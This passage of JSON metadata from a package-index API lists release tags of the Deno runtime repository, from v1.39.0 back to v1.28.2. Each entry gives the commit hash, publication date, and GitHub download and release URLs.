url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposit